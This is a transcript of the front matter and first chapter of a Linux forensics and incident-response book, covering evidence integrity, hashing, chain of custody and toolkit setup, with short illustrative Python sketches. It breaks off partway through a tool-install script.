createspace linux forensics


Post on 15-Apr-2016


DESCRIPTION

Linux Forensics is the most comprehensive and up-to-date resource for those wishing to quickly and efficiently perform forensics on Linux systems. It is also a great asset for anyone that would like to better understand Linux internals. It will guide you step by step through the process of investigating a computer running Linux. Everything you need to know from the moment you receive the call from someone who thinks they have been attacked until the final report is written is covered in this book. All of the tools discussed in this book are free and most are also open source.

TRANSCRIPT

Linux Forensics

Philip Polstra

Copyright (c) 2015 by Pentester Academy

All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law.

Although every precaution has been taken to verify the accuracy of the information contained herein, the author and publisher assume no responsibility for any errors or omissions. No liability is assumed for damages that may result from the use of information contained within.

First published: July 2015

Published by Pentester Academy, a division of Binary Security Innovative Solutions Pvt. Ltd.

http://www.PentesterAcademy.com

First Edition

Dedicated to my wife of twenty five years

Contents

Acknowledgements

Author Biography

Foreword

Scripts, Videos, Teaching Aids, Community Forums and more

Introduction

CHAPTER 1 First Steps

INFORMATION IN THIS CHAPTER:

WHAT IS FORENSICS?

TYPES OF FORENSICS

WHY LINUX FORENSICS?

GENERAL PRINCIPLES

Maintaining Integrity

Chain of Custody

Standard Practices

Documentation

PHASES OF INVESTIGATION

Evidence Preservation and Collection

Evidence Searching

Reconstruction of Events

HIGH-LEVEL PROCESS

Every Child is Perfect, Just Ask The Parents

BUILDING A TOOLKIT

Hardware

Software

Running live Linux in a virtual machine

SUMMARY

CHAPTER 2 Determining If There Was an Incident

INFORMATION IN THIS CHAPTER:

OPENING A CASE

TALKING TO USERS

DOCUMENTATION

If you are using a virtual machine, older may be better

MOUNTING KNOWN-GOOD BINARIES

MINIMIZING DISTURBANCE TO THE SUBJECT SYSTEM

Using a USB drive to store data

Using Netcat

Sending data from the subject system

Sending files

USING SCRIPTING TO AUTOMATE THE PROCESS

Scripting the server

Scripting the client

Short circuiting is useful in many places

INTRODUCING OUR FIRST SUBJECT SYSTEM

COLLECTING VOLATILE DATA

Date and time information

Operating system version

Network interfaces

Network connections

Open ports

Programs associated with various ports

Open Files

Running Processes

Routing Tables

Mounted filesystems

Loaded kernel modules

Users past and present

Putting it together with scripting

SUMMARY

CHAPTER 3 Live Analysis

INFORMATION IN THIS CHAPTER:

THERE WAS AN INCIDENT: NOW WHAT?

GETTING FILE METADATA

USING A SPREADSHEET PROGRAM TO BUILD A TIMELINE

EXAMINING USER COMMAND HISTORY

GETTING LOG FILES

COLLECTING FILE HASHES

DUMPING RAM

RAM acquisition methods

Building LiME

Using LiME to dump RAM

SUMMARY

CHAPTER 4 Creating Images

INFORMATION IN THIS CHAPTER:

SHUTTING DOWN THE SYSTEM

Normal shutdown

Pulling the plug

IMAGE FORMATS

Raw format

Proprietary format with embedded metadata

Proprietary format with metadata in a separate file

Raw format with hashes stored in a separate file

USING DD

USING DCFLDD

HARDWARE WRITE BLOCKING

SOFTWARE WRITE BLOCKING

Udev rules

Live Linux distributions

CREATING AN IMAGE FROM A VIRTUAL MACHINE

CREATING AN IMAGE FROM A PHYSICAL DRIVE

SUMMARY

CHAPTER 5 Mounting Images

INFORMATION IN THIS CHAPTER:

PARTITION BASICS

MASTER BOOT RECORD PARTITIONS

EXTENDED PARTITIONS

GUID PARTITIONS

MOUNTING PARTITIONS FROM AN IMAGE FILE ON LINUX

USING PYTHON TO AUTOMATE THE MOUNTING PROCESS

MBR-based primary partitions

Scripting or Programming Language

MBR-based extended partitions

GPT partitions

SUMMARY

CHAPTER 6 Analyzing Mounted Images

INFORMATION IN THIS CHAPTER:

GETTING MODIFICATION, ACCESS, AND CREATION TIMESTAMPS

IMPORTING INFORMATION INTO LIBREOFFICE

IMPORTING DATA INTO MySQL

When tools fail you

CREATING A TIMELINE

EXAMINING BASH HISTORIES

EXAMINING SYSTEM LOGS

EXAMINING LOGINS AND LOGIN ATTEMPTS

OPTIONAL – GETTING ALL THE LOGS

SUMMARY

CHAPTER 7 Extended Filesystems

INFORMATION IN THIS CHAPTER:

EXTENDED FILESYSTEM BASICS

SUPERBLOCKS

EXTENDED FILESYSTEM FEATURES

Compatible Features

Incompatible features

Read-only compatible features

USING PYTHON

Reading the superblock

Reading block group descriptors

Combining superblock and group descriptor information

FINDING THINGS THAT ARE OUT OF PLACE

INODES

Reading inodes with Python

Inode extensions and details

Going from an inode to a file

Extents

Directory entries

Extended attributes

JOURNALING

SUMMARY

CHAPTER 8 Memory Analysis

INFORMATION IN THIS CHAPTER:

VOLATILITY

CREATING A VOLATILITY PROFILE

GETTING PROCESS INFORMATION

PROCESS MAPS AND DUMPS

GETTING BASH HISTORIES

VOLATILITY CHECK COMMANDS

GETTING NETWORKING INFORMATION

GETTING FILESYSTEM INFORMATION

MISCELLANEOUS VOLATILITY COMMANDS

SUMMARY

CHAPTER 9 Dealing with More Advanced Attackers

INFORMATION IN THIS CHAPTER:

SUMMARY OF THE PFE ATTACK

THE SCENARIO

INITIAL LIVE RESPONSE

MEMORY ANALYSIS

FILESYSTEM ANALYSIS

LEVERAGING MYSQL

MISCELLANEOUS FINDINGS

SUMMARY OF FINDINGS AND NEXT STEPS

SUMMARY

CHAPTER 10 Malware

INFORMATION IN THIS CHAPTER:

IS IT MALWARE?

The file command

Is it a known-bad file?

Using strings

Listing symbol information with nm

Listing shared libraries with ldd

I THINK IT IS MALWARE

Getting the big picture with readelf

Using objdump to disassemble code

DYNAMIC ANALYSIS

Tracing system calls

Tracing library calls

Using the GNU Debugger for reverse engineering

OBFUSCATION

SUMMARY

CHAPTER 11 The Road Ahead

INFORMATION IN THIS CHAPTER:

NOW WHAT?

COMMUNITIES

LEARNING MORE

CONGREGATE

CERTIFY

SUMMARY

Acknowledgements

First and foremost I would like to thank my wife and children for allowing me to take the time to write this book. This book would never have happened without their support.

Many thanks to Vivek Ramachandran and the whole Pentester Academy team for honoring me twice. First, I had the privilege of being the first external trainer for Pentester Academy. Second, I was granted the ability to author the first book ever published by Pentester Academy.

My deepest thanks go to Dr. Susan Baker for graciously offering to read this entire book and serve as copy editor.

Finally, I would like to thank my many supportive friends in the information security community who have provided encouragement to me throughout the years.

Author Biography

Dr. Philip Polstra (known to his friends as Dr. Phil) is an internationally recognized hardware hacker. His work has been presented at numerous conferences around the globe including repeat performances at DEFCON, BlackHat, 44CON, GrrCON, MakerFaire, ForenSecure, and other top conferences. Dr. Polstra is a well-known expert on USB forensics and has published several articles on this topic. He has developed a number of video courses including ones on Linux forensics, USB forensics, and reverse engineering.

Dr. Polstra has developed degree programs in digital forensics and ethical hacking while serving as a professor and Hacker in Residence at a private university in the Midwestern United States. He currently teaches computer science and digital forensics at Bloomsburg University of Pennsylvania. In addition to teaching, he provides training and performs penetration tests on a consulting basis. When not working, he has been known to fly, build aircraft, and tinker with electronics. His latest happenings can be found on his blog: http://polstra.org. You can also follow him at @ppolstra on Twitter.

Foreword

Hello All!

Phil and I met online around five years back through SecurityTube.net and we’ve been great friends ever since. Over the years, we discussed interesting projects we could collaborate on and information security education was on top of our list as expected. Based on our discussions, Phil created an excellent “USB Forensics” and “Linux Forensics” video series for Pentester Academy! Both video series were fantastic and well received by our students.

I’d always wanted to convert our online video series into books and Phil’s “Linux Forensics” video course seemed like the best place to start this adventure! And so we have! I’d like to take this opportunity to wish Phil and my publishing team at Pentester Academy bon voyage on this new endeavor!

Finally but most importantly, I’d like to thank the SecurityTube.net and Pentester Academy community and our students for their love and support over the years! We would not be here today without you guys! You’ve made all our dreams come true. We cannot thank you enough.

Vivek Ramachandran

Founder, SecurityTube.net and Pentester Academy

Scripts, Videos, Teaching Aids, Community Forums and more

Book website

We’ve created two mirror websites for the “Linux Forensics” book:

http://www.pentesteracademy.com/books
http://www.linuxforensicsbook.com

Scripts and Supporting Files

All Python and shell scripts have been made available for download on the website. We’ve tried our best to ensure that the code works and is error free but if you find any bugs please report them and we will publicly acknowledge you on the website.

Videos

We are Pentester Academy and we love videos! Though the book is completely self-sufficient we thought it would be fun to have videos for a select few labs by the book author himself! You can access these for FREE on the book website.

Community Forums

We would love to connect with our book readers, get their feedback, and learn from them firsthand what they would like to see in the next edition. Also, wouldn’t it be great to have a community forum where readers could interact with each other and even with the author? Our book community forums do just that! You can access the forums through the website mentioned above.

Teaching Aids

Are you a professor or a commercial trainer? Do you want to use this book in class? We’ve got you covered! Through our website, you can register as a trainer and get access to teaching aids such as presentations and exercise files.

Linux Forensics Book Swag!

Visit the swag section on our website and get your “Linux Forensics” T-shirts, mugs, keychains and other cool swag!

Introduction

Information in This Chapter:

What this book is about
Intended audience
How this book is organized

What this book is about

This book is about performing forensic investigations on subject systems running the Linux operating system. In many cases Linux forensics is something that is done as part of incident response. That will be the focus of this book. That said, much of what you need to know in order to perform Linux incident response can also be applied to any Linux forensic investigation.

Along the way we will learn how to better use Linux and the many tools it provides. In addition to covering the essentials of forensics, we will explore how to use Python, shell scripting, and standard Linux system tools to more quickly and easily perform forensic investigations. Much of what is covered in this book can also be leveraged by anyone wishing to perform forensic investigations of Windows subjects on a Linux-based forensics workstation.

Intended audience

This book is primarily intended to be read by forensics practitioners and other information security professionals. It describes in detail how to investigate computers running Linux. Forensic investigators who work primarily with Windows subjects and would like to learn more about Linux should find this book useful. This book should also prove useful to Linux users and system administrators who are interested in the mechanics of Linux system breaches and ensuing investigations. The information contained within this book should allow a person to investigate the majority of attacks on Linux systems.

The only knowledge a reader of this book is assumed to have is that of a normal Linux user. You need not be a Linux system administrator, hacker, or power user to learn from this book. Knowledge of Linux system administration, Python, shell scripting, and Assembly would be helpful, but definitely not required. Sufficient information will be provided for those new to these topics.

How this book is organized

This book begins with a brief introduction to forensics. From there we will delve into answering the question, “Was there an incident?” In order to answer this question, various live analysis tools and techniques will be presented. We then discuss the creation and analysis of forensic filesystem and memory images. Advanced attacks on Linux systems and malware round out our discussion.

Chapter 1: First Steps

Chapter 1 is an introduction to the field of forensics. It covers the various types of forensics and motivation for performing forensics on Linux systems. Phases of investigations and the high-level process are also discussed. Step-by-step instructions for building a Linux forensics toolkit are provided in this chapter.

Chapter 2: Was there an incident?

Chapter 2 walks you through what happens from the point where a client who suspects something has happened calls until you can be reasonably sure whether there was or was not an incident. It covers opening a case, talking to users, creating appropriate documentation, mounting known-good binaries, minimizing disturbance to the subject system, using scripting to automate the process, and collecting volatile data. A nice introduction to shell scripting is also provided in this chapter.

Chapter 3: Live Analysis

Chapter 3 describes what to do before shutting down the subject system. It covers capturing file metadata, building timelines, collecting user command histories, performing log file analysis, hashing, dumping memory, and automating with scripting. A number of new shell scripting techniques and Linux system tools are also presented in this chapter.

Chapter 4: Creating Images

Chapter 4 starts with a discussion of the options for shutting down a subject system. From there the discussion turns to tools and techniques used to create a forensic image of a filesystem. Topics covered include shutting down the system, image formats, using dd and dcfldd, hardware and software write blocking, and live Linux distributions. Methods of creating images for different circumstances are discussed in detail.

Chapter 5: Mounting Images

Chapter 5 begins with a discussion of the various types of partitioning systems: Master Boot Record (MBR) based partitions, extended partitions, and GUID partition tables. Linux commands and techniques used to mount all types of partitions are presented. The chapter ends with an introduction to Python and how it can be used to automate the process of mounting partitions.

Chapter 6: Analyzing Mounted Images

Chapter 6 describes how to analyze mounted filesystem images. It covers file metadata, command histories, system logs, and other common information investigated during dead analysis. Use of spreadsheets and MySQL to enhance investigations is discussed. Some new shell scripting techniques are also presented.

Chapter 7: Extended Filesystems

Chapter 7 is the largest chapter in this book. All aspects of Linux extended filesystems (ext2, ext3, and ext4) are discussed in detail. An extensive set of Python and shell scripts is presented in this chapter. Advanced techniques for detecting alterations of metadata by an attacker are provided in this chapter.

Chapter 8: Memory Analysis

Chapter 8 introduces the new field of memory analysis. The Volatility memory analysis framework is discussed in detail. Topics covered include creating Volatility profiles, getting process information, process maps and dumps, getting bash histories, using Volatility check plugins, retrieving network information, and obtaining in-memory filesystem information.

Chapter 9: Dealing with More Advanced Attackers

Chapter 9 walks you through a more sophisticated attack in detail. The techniques described up to this point in the book are applied to a new scenario. Reporting of findings to the client is also discussed.

Chapter 10: Malware

Chapter 10 provides an introduction to Linux malware analysis. It covers standard tools for investigating unknown files such as the file utility, hash databases, the strings utility, nm, ldd, readelf, objdump, strace, ltrace, and gdb. Obfuscation techniques are discussed. Safety issues are presented. An introduction to Assembly is also provided.

Chapter 11: The Road Ahead

In this final chapter several suggestions for further study are provided. General tips are also given for a successful career involving forensics.

Conclusion

Countless hours have been spent developing this book and accompanying scripts. It has been a labor of love, however. I hope you enjoy reading and actually applying what is in this book as much as I have enjoyed writing it.

For updates to this book and also my latest happenings consult my website http://philpolstra.com. You can also contact me via my Twitter account, @ppolstra. Downloads related to the book and other forms of community support are available at Pentester Academy http://pentesteracademy.com.

CHAPTER 1

First Steps

INFORMATION IN THIS CHAPTER:

What is forensics?
Types of forensics
Why Linux forensics?
General principles
Phases of investigation
High-level process
Building a toolkit

WHAT IS FORENSICS?

A natural question to ask yourself if you are reading a book on Linux forensics is: What is forensics anyway? If you ask different forensic examiners you are likely to receive slightly different answers to this question. According to a recent version of the Merriam-Webster dictionary: “Forensic (n) belonging to, used in, or suitable to courts of judicature or to public discussion and debate.” Using this definition of the word forensic my definition of forensic science is as follows:

Forensic science or forensics is the scientific collection of evidence of sufficient quality that it is suitable for use in court.

The key point to keep in mind is that we should be collecting evidence of sufficient quality that we can use it in court, even if we never intend to go to court with our findings. It is always easier to relax our standards than to tighten them later. We should also act like scientists, doing everything in a methodical and technically sound manner.

TYPES OF FORENSICS

When most people hear the term forensics they think about things they might have seen on shows such as CSI. This is what I refer to as physical forensics. Some of the more commonly encountered areas of physical forensics include fingerprints, DNA, ballistics, and blood spatter. One of the fundamental principles of physical forensics is Locard’s Transfer (or Exchange) Principle. Locard essentially said that if objects interact, they transfer (or exchange) material. For example, if you hit something with your car there is often an exchange of paint. As further examples, when you touch a surface you might leave fingerprints and you might take dirt with you on your shoes when you leave an area.

This book covers what I would refer to as digital forensics. Some like the term computer forensics, but I prefer digital forensics as it is much broader. We live in a world that is increasingly reliant on electronic devices such as smart phones, tablets, laptops, and desktop computers. Given the amount of information many people store on their smart phones and other small devices, it is often useful to examine those devices if someone is suspected of some sort of crime. The scope of this book is limited to computers (which could be embedded) running a version of Linux.

There are many specializations within the broader space of digital forensics. These include network forensics, data storage forensics, small device forensics, computer forensics, and many other areas. Within these specializations there are further subdivisions. It is not unusual for forensic examiners to be highly specialized. My hope is that by the time you finish this book you will be proficient enough with Linux forensics to perform investigations of all but the most advanced attacks on Linux systems.

WHY LINUX FORENSICS?

Presumably if you are reading this you see the value in learning Linux forensics. The same may not be true of your boss and others, however. Here is some ammunition for them on why you might benefit from studying Linux forensics.

While Linux is not the most common operating system on the desktop, it is present in many places. Even in the United States, where Windows tends to dominate the desktops, many organizations run Linux in the server room. Linux is the choice of many Internet Service Providers (ISPs) and large companies such as Google (they even have their own flavor of Linux). Linux is also extremely popular in development organizations.

Linux is the standard choice for anyone working in information security or forensics. As the operating system “by programmers for programmers,” it is very popular with black hat hackers. If you find yourself examining the black hat’s computer, it is likely running Linux.

Many devices all around us are running some version of Linux. Whether it is the wireless access point that you bought at the local electronics store or the smart temperature controller keeping your home comfortable, they are likely running Linux under the hood. Linux also shares some heritage and functionality with Android and OS X.

Linux is also a great platform for performing forensics on Windows, OS X, Android or other systems. The operating system is rich with free and open source tools for performing forensics on devices running virtually every operating system on the planet. If your budget is limited, Linux is definitely the way to go.

GENERAL PRINCIPLES

There are a number of general guiding principles that should be followed when practicing forensics. These include maintaining the integrity of evidence, maintaining the chain of custody, following standard practice, and fully documenting everything. These are discussed in more detail below.

Maintaining Integrity

It is of the utmost importance that evidence not be altered while it is being collected and examined. We are fortunate in digital forensics that we can normally make an unlimited number of identical copies of evidence. Those working with physical forensics are not so lucky. In fact, in many cases difficult choices must be made when quantities of physical evidence are limited as many tests consume evidence.

The primary method of ensuring integrity of digital evidence is hashing. Hashing is widely used in computer science as a way of improving performance. A hash function, generally speaking, takes an input of variable size and outputs a number of known size. Hashing allows for faster searches because computers can compare two numbers in one clock cycle versus iterating over every character in a long string which could require hundreds or thousands of clock cycles.

Using hash functions in your programs can add a little complication because more than one input value can produce the same hash output. When this happens we say that a collision has occurred. Collisions are a complication in our programs, but when we are using hashes for encryption or integrity checking the possibility of many collisions is unacceptable. To minimize the number of collisions we must use cryptographic hash functions.
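To make the idea of a collision concrete, here is a minimal Python sketch. The toy_hash function is a deliberately weak hash invented for this illustration (it is not one of the book's scripts); it is compared against SHA256 from Python's standard hashlib module.

```python
import hashlib


def toy_hash(data: bytes) -> int:
    """Deliberately weak, hypothetical hash: sum of byte values modulo 256."""
    return sum(data) % 256


a, b = b"ab", b"ba"

# The toy hash ignores byte order, so these two different inputs collide.
print("toy hash collides:", toy_hash(a) == toy_hash(b))

# A cryptographic hash produces different digests for the same two inputs.
print("SHA256 collides:  ",
      hashlib.sha256(a).digest() == hashlib.sha256(b).digest())
```

The toy function collides on any two inputs that contain the same bytes in a different order, which is exactly the kind of behavior that makes a hash unsuitable for integrity checking.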

There are several cryptographic hash functions available. Some people still use the Message Digest 5 (MD5) algorithm to verify integrity of images. The MD5 algorithm is no longer considered to be secure and the Secure Hash Algorithm (SHA) family of functions is preferred. The original version is referred to as SHA1 (or just SHA). SHA2 is currently the most commonly used variant and you may encounter references to SHA224 (224 bits), SHA256 (256 bits), SHA384 (384 bits), and SHA512 (512 bits). There is a SHA3 algorithm, but its use is not yet widespread. I normally use SHA256 which is a good middle ground offering good performance with low chances of collisions.
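The following short sketch, which assumes only Python's standard hashlib module, shows two of the points made above: each SHA variant is named for its output size, and that size does not change with the size of the input. The helper name digest_bits is made up for this example.

```python
import hashlib


def digest_bits(name: str, data: bytes) -> int:
    """Return the output size, in bits, of the named hash applied to data."""
    return hashlib.new(name, data).digest_size * 8


small = b"x"               # one byte of input
large = b"x" * 1_000_000   # roughly one megabyte of input

for name in ("sha1", "sha224", "sha256", "sha384", "sha512"):
    # The two sizes printed on each line are always equal.
    print(name, digest_bits(name, small), digest_bits(name, large))
```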

We will discuss the details of using hashing in future chapters. For now the high level process is as follows. First, calculate a hash of the original. Second, create an image which we will treat as a master copy. Third, calculate the hash of the copy and verify that it matches the hash of the original. Fourth, make working copies of your master copy. The master copy and original should never be used again. While it may seem strange, the hash on working copies should be periodically recalculated as a double check that the investigator did not alter the image.
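The four steps above can be sketched in Python as follows. This is only an illustration under stated assumptions: a small temporary file stands in for the original media, shutil.copyfile stands in for a real imaging tool such as dd or dcfldd, and the names sha256_file and demo are hypothetical.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so that large images need not fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        # Stand-in for the original media (assumption for this sketch).
        original = tmp / "original.img"
        original.write_bytes(b"\x00" * 4096 + b"stand-in for disk contents")

        original_hash = sha256_file(original)      # 1. hash the original
        master = tmp / "master.img"
        shutil.copyfile(original, master)          # 2. create the master copy
        if sha256_file(master) != original_hash:   # 3. verify the master copy
            raise RuntimeError("master copy does not match the original")
        working = tmp / "working.img"
        shutil.copyfile(master, working)           # 4. make a working copy

        # Periodic recheck of the working copy, before and after a
        # simulated accidental alteration.
        ok_before = sha256_file(working) == original_hash
        with open(working, "ab") as f:
            f.write(b"x")
        ok_after = sha256_file(working) == original_hash
        return ok_before, ok_after


print(demo())
```

The recheck passes before the working copy is touched and fails after a single byte is appended, which is the reason for periodically recalculating hashes on working copies.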

Chain of Custody

Physical evidence is often stored in evidence bags. Evidence bags either incorporate a chain of custody form or have such a form attached to them. Each time evidence is removed from the bag the form is updated with who touched the evidence and what was done. The collection of entries on this form makes up the chain of custody. Essentially the chain of custody is a guarantee that the evidence has not been altered and has been properly maintained.

In the case of digital forensics the chain of custody is still important. While we can make unlimited digital copies, we must still maintain the integrity of the original. This is also why a master copy should be made that is never used for any other purpose than creating working copies as it prevents the need to touch the original other than for the one-time event of creating the master copy.

Standard Practices

Following standard practices makes your investigation easier. By following a written procedure accurately there is less explaining to do if you should find yourself in court. You are also less likely to forget something or make a mistake. Additionally, if you follow standard practices there is less documentation that has to be done. It used to be said that “nobody was ever fired for buying IBM.” Similarly, no forensic investigator ever got into trouble using written procedures that conform to industry standard practice.

Documentation

When in doubt document. It never hurts to overdo the documentation. As mentioned previously, if you follow standard written procedures you can reference them as opposed to repeating them in your notes. Speaking of notes, I recommend handwritten notes in a bound notebook with numbered pages. This might sound strange to readers who are used to using computers for everything, but it is much quicker to jot notes onto paper. It is also easier to carry a set of handwritten notes to court.

The bound notebook has other advantages as well. No power is required to view these notes. The use of a bound notebook with numbered pages also makes it more difficult to alter your notes. Not that you would alter them, but a lawyer might not be beyond accusing you of such a thing. If you have difficulty finding a notebook with numbered pages you can number them yourself before use.

If you can work with someone else it is ideal. Pilots routinely use checklists to make sure they don’t miss anything. Commercial pilots work in pairs as extra insurance against mistakes. Working with a partner allows you to have a second set of eyes, lets you work more quickly, and also makes it even harder for someone to accuse you of tampering with evidence. History is replete with examples of people who have avoided conviction by accusing someone of evidence tampering and instilling sufficient doubt in a jury.

Few people love to do documentation. This seems to be true to a greater extent among technical people. There are some tools that can ease the pain of documenting your findings that will be discussed in later chapters of this book. An investigation is never over until the documentation is finished.

PHASES OF INVESTIGATION

There are three phases to a forensic investigation: evidence preservation, evidence searching, and event reconstruction. It is not unusual for there to be some cycling between the phases as an investigation proceeds. These phases are described in more detail below.

Evidence Preservation and Collection

Medical professionals have a saying “First do no harm.” For digital forensics practitioners our motto should be “Don’t alter the data.” This sounds simple enough. In actuality it is a bit more complicated as data is volatile. There is a hierarchy of volatility that exists in data found in any system.

The most volatile data can be found in CPU registers. These registers are high speed scratch memory locations. Capturing their contents is next to impossible. Fortunately, there is little forensic value in these contents. CPU caches are the next level down in terms of volatility. Like registers they are hard to capture and also, thankfully, of little forensic value.

Slightly less volatile than storage in the CPU are buffers found in various devices such as network cards. Not all input/output devices have their own storage buffers. Some low-speed devices use main system memory (RAM) for buffering. As with data stored in the CPU, this data is difficult to capture. In theory, anything stored in these buffers should be replicated in system memory assuming it came from or was destined for the target computer.

System memory is also volatile. Once power has been lost, RAM is cleared. When compared to previously discussed items, system memory is relatively easy to capture. In most cases it is not possible to collect the contents of system memory without changing memory contents slightly. An exception to this would be hardware-based memory collection. Memory acquisition will be discussed in greater detail in a later chapter.

Due to limitations in technology, until recently much of digital forensics was focused on “dead analysis” of images from hard drives and other media. Even when dealing with non-volatile media, volatility is still an issue. One of the oldest questions in computer security and forensics is whether or not to pull the plug on a system you suspect has been compromised.

Pulling the plug can lead to data loss as anything cached for writing to media will disappear. On modern journaling filesystems (by far the most common situation on Linux systems today) this is less of an issue as the journal can be used to correct any corruption. If the system is shut down in the normal manner some malware will attempt to cover its tracks or even worse destroy other data on the system.

Executing a normal shutdown has the advantage of flushing buffers and caches. As previously mentioned, the orderly shutdown is not without possible disadvantages. As with many things in forensics, the correct answer as to which method is better is, “it depends.” There are methods of obtaining images of hard drives and other media which do not require a system shutdown which further complicates this decision. Details of these methods will be presented in future chapters.

Evidence Searching

Thanks to the explosion of storage capacity it becomes harder to locate evidence within the sea of data stored in a typical computer with each passing year. Data exists at three levels: data, information, and evidence, as shown in Figure 1.1.

FIGURE 1.1

The data hierarchy.

As shown in Figure 1.1, the lowest level of data is just raw data. Raw data consists of bits, normally organized as bytes, in volatile or non-volatile storage. In this category we find things such as raw disk sectors. It can be a challenge to use data at this level and on most modern systems there is plenty of data out there to pick through.

Above raw data we have information. Information consists of raw data with some sort of meaning attached to it. For example, an image has more meaning to a human than the bits that make up a JPEG file used to store the image. Even text files exist at this level in our hierarchy. Bringing many bytes of ASCII or Unicode values together gives them meaning beyond their collection of bytes.
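As a small illustration of the step from raw data to information, the Python sketch below interprets the same kind of bytes in two ways. The sample byte values and the helper name looks_like_jpeg are chosen for this example only; the check relies on the fact that JPEG files begin with the bytes FF D8 FF.

```python
# Five raw byte values with no meaning attached yet.
raw = bytes([0x4C, 0x69, 0x6E, 0x75, 0x78])
print(list(raw))            # the raw data, shown as plain numbers

# Interpreting the bytes as ASCII text turns them into information.
text = raw.decode("ascii")
print(text)


def looks_like_jpeg(data: bytes) -> bool:
    """Return True if data starts with the JPEG signature FF D8 FF."""
    return data[:3] == b"\xff\xd8\xff"


print(looks_like_jpeg(raw))
print(looks_like_jpeg(b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```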

At the highest level in our hierarchy is evidence. While there may be thousands or millions of files (collections of information) it is unlikely that the bulk of them have any relevance to an investigation. This leads us to ponder what it means for information to be relevant to an investigation.

As previously mentioned, forensics is a science. Given that we are trying to do science, we should be developing hypotheses and then searching for information that supports or refutes a hypothesis. It is important to remain objective during an investigation as the same piece of evidence might be interpreted differently based on people’s preconceived notions.

It is extremely important that investigators do not become victims of confirmation bias. Put simply, confirmation bias is only looking at information that supports what you believe to be true while discounting anything that would refute what you believe. Given the amount of data that must be examined in a typical investigation, it is good to have a hypothesis or two concerning what you think you will find (the owner of the computer did X, this computer was successfully exploited, etc.) to help guide you through the searching process. Don’t fall into the trap of assuming your hypothesis or hypotheses are correct, however.

CONFIRMATION BIAS IN ACTION

Every Child is Perfect, Just Ask The Parents

One of the best stories to describe confirmation bias goes as follows. Johnny loved magicians. One day his parents took him to see a famous magician, Phil the Great. At the end of the show the parents told Phil how much their son loved magic. Phil then offered to show them a trick. Johnny eagerly accepted.

The magician proceeded to pull out a coin and move it back and forth between both hands then closed his fists and held out his hands. He asked Johnny to identify the hand containing the coin, which he did correctly. Now guessing correctly one time is not much of a feat, but this game was repeated many times and each time Johnny correctly guessed the hand containing the coin. While this was going on the magician made comments like, “You must have excellent vision to see which hand contains the coin,” and “You must be an expert on reading my facial expressions and that is how you know where the coin is.”

Eventually Johnny had correctly identified the hand with the coin fifty times in a row! His parents were amazed. They called the grandparents and told all of their friends about it on Facebook, Twitter, and other social media sites. When they finally thanked the magician and turned to leave, he shouted, “goodbye,” and waved with both hands. Each hand contained a coin.

It was the parents’ confirmation bias that led them to believe what they wanted to believe, that Johnny was a savant, and distracted them from the truth, that the magician was indeed tricking them. Remain objective during an investigation. Don’t let what you or your boss want to be true keep you from seeing contrary evidence.

Reconstruction of Events

In my mind trying to reconstruct what happened is the most fun part of an investigation. The explosion in size of storage media might make the searching phase longer than it was in the past, but that only helps to make the reconstruction phase that much more enjoyable. It is very unlikely that you will find all the evidence you need for your event reconstruction in one place. It is much more common to get little pieces of evidence from multiple places which you put together into a larger picture. For example, a suspicious process in a process list stored in a memory image might lead you to look at files in a filesystem image which might lead you back to an open file list in the memory image which in turn points toward files in the filesystem image. Putting all of these bits together might allow you to determine when and by whom a rootkit was downloaded and when and by which user it was subsequently installed.

HIGH-LEVEL PROCESS

While not every Linux forensic investigation is part of an incident response, incident response will be the focus of this book. The justification for this is that the vast majority of Linux forensic investigations are conducted after a suspected breach. Additionally, many of the items discussed in this book will be relevant to other Linux investigations as well. The high-level process for incident response is shown in Figure 1.2.

FIGURE 1.2

High-level Process for Linux Incident Response

As can be seen in Figure 1.2, it all begins with a call. Someone believes that a breach (or something else) has occurred and they have called you to investigate. Your next step is to determine whether or not there was a breach. A small amount of live analysis might be required in order to make this determination. If no breach occurred, you get to document what happened and add this to your knowledge base.

If there was an incident, you would normally start with live analysis before deciding whether or not dead analysis is justified. If you deem it necessary to perform the dead analysis you need to acquire some images and then actually perform the analysis. Whether or not you performed a dead analysis, it isn’t over until the reports are written. All of these steps will be discussed in detail in future chapters.

BUILDING A TOOLKIT

In order to do Linux forensics effectively you might want to acquire a few tools. When it comes to software tools you are in luck as all of the Linux forensics tools discussed in this book are free (most are also open source). In addition to the notebook discussed previously, some hardware and software should be in every forensic investigator’s toolkit.

Hardware

You will likely want one or more external hard drives for making images (both RAM and hard disks). External hard drives are preferred as it is much easier to share with other investigators when they can just plug in a drive. USB 3.0 devices are the best as they are significantly faster than their USB 2.0 counterparts.

A write blocker is also helpful whenever an image is to be made of any media. Several hardware write blockers are available. Most of these are limited to one particular interface. If your budget affords only one hardware write blocker, I would recommend a SATA blocker as this is the most common interface in use at this time. Software write blockers are also a possibility. A simple software write blocker is presented later in this book.

Software

Software needs fall into a few categories: forensic tools, system binaries, and live Linux distributions. Ideally these tools are stored on USB 3.0 flash drives and perhaps a few DVDs if you anticipate encountering systems that cannot boot from a USB drive. Given how cheap USB flash drives are today, even investigators with modest budgets can be prepared for most situations.

There are a number of ways to install a set of forensics tools. The easiest method is to install a forensics oriented Linux distribution such as SIFT from SANS (http://digital-forensics.sans.org/community/downloads). Personally, I prefer to run my favorite Linux and just install the tools rather than be stuck with someone else’s themes and sluggish live system performance. The following script will install all of the tools found in SIFT on most Debian or Ubuntu based systems (unlike the SANS install script that works only on specific versions of Ubuntu).

#!/bin/bash
# Simple little script to load DFIR tools into Ubuntu and Debian systems
# by Dr. Phil Polstra @ppolstra
# (must be run as root: it writes under /etc/apt and installs packages)
# create repositories
echo "deb http://ppa.launchpad.net/sift/stable/ubuntu trusty main" \
  > /etc/apt/sources.list.d/sift-ubuntu-stable-utopic.list
echo "deb http://ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main" \
  > /etc/apt/sources.list.d/tualatrix-ubuntu-ppa-utopic.list
# list of packages
pkglist="aeskeyfind

afflib-tools

afterglow

aircrack-ng

arp-scan

autopsy

binplist

bitpim

bitpim-lib

bless

blt

build-essential

bulk-extractor

cabextract

clamav

